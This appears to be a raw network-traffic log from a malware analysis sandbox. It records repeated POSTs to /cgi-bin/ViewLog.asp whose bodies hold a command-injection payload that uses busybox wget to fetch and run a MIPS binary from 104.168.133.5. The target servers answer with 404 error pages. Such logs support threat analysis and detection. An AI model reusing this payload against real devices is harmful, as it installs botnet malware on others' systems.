                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:21.155256987 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              162192.168.2.145023062.159.28.1538080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:45.740139008 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:45.952421904 CET1044INHTTP/1.1 404
                                              Content-Type: text/html
                                              Content-Length: 816
                                              Date: Thu, 23 Nov 2023 04:15:45 GMT
                                              Keep-Alive: timeout=120
                                              Connection: keep-alive
                                              Server: BIS
                                              Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 53 45 45 42 55 52 47 45 52 20 48 54 54 50 20 4c 69 73 74 65 6e 65 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 30 30 30 30 65 65 22 20 61 6c 69 6e 6b 3d 22 23 30 30 30 30 65 65 22 20 76 6c 69 6e 6b 3d 22 23 35 35 31 61 38 62 22 3e 0a 20 20 20 20 20 20 3c 74 61 62 6c 65 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 62 6f 72 64 65 72 3d 22 30 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 67 63 6f 6c 6f 72 3d 22 23 46 30 30 42 31 39 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 74 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 3c 74 64 3e 26 6e 62 73 70 3b 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 3e 26 6e 62 73 70 3b 3c 2f 74 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 76 61 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 6e 74 20 66 61 63 65 3d 22 73 61 6e 73 2d 73 65 72 69 66 22 20 63 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 3e 53 45 45 42 55 52 47 45 52 20 48 54 54 50 20 4c 69 73 74 65 6e 65 72 3c 2f 66 6f 6e 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 68 33 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 72 3e 0a 20 20 20 20 20 20 20 20 20 3c 2f 74 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 74 61 62 6c 65 3e 0a 20 20 20 20 20 20 3c 62 72 2f 3e 0a 20 20 20 20 20 20 20 20 20 3c 66 6f 6e 74 20 66 61 63 65 3d 22 73 61 6e 73 2d 73 65 72 69 66 22 20 73 69 7a 65 3d 22 2d 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 3c 62 3e 0a 34 30 34 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 3e 0a 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 6e 74 3e 0a 0a 20 20 20 20 20 20 3c 62 72 2f 3e 0a 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <head> <title>SEEBURGER HTTP Listener</title> </head> <body bgcolor="#ffffff" text="#000000" link="#0000ee" alink="#0000ee" vlink="#551a8b"> <table cellpadding="0" cellspacing="0" border="0" width="100%" bgcolor="#F00B19"> <tbody> <tr><td>&nbsp;</td></tr> <tr> <td>&nbsp;</td> <td valign="middle"> <h3> <font face="sans-serif" color="#ffffff">SEEBURGER HTTP Listener</font> </h3> </td> </tr> </tbody> </table> <br/> <font face="sans-serif" size="-1"> <b>404 Not found </b> </font> <br/> </body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              163192.168.2.144830662.162.114.1978080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:45.758783102 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:45.974934101 CET1227INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 989
                                              Date: Thu, 23 Nov 2023 04:12:52 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.59 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.59</h3></body></html>
                                              Nov 23, 2023 05:15:47.018645048 CET1227INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 989
                                              Date: Thu, 23 Nov 2023 04:12:52 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.59 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.59</h3></body></html>
                                              Nov 23, 2023 05:15:49.110613108 CET1227INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 989
                                              Date: Thu, 23 Nov 2023 04:12:52 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.59 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.59</h3></body></html>
                                              Nov 23, 2023 05:15:53.306622982 CET1227INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 989
                                              Date: Thu, 23 Nov 2023 04:12:52 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 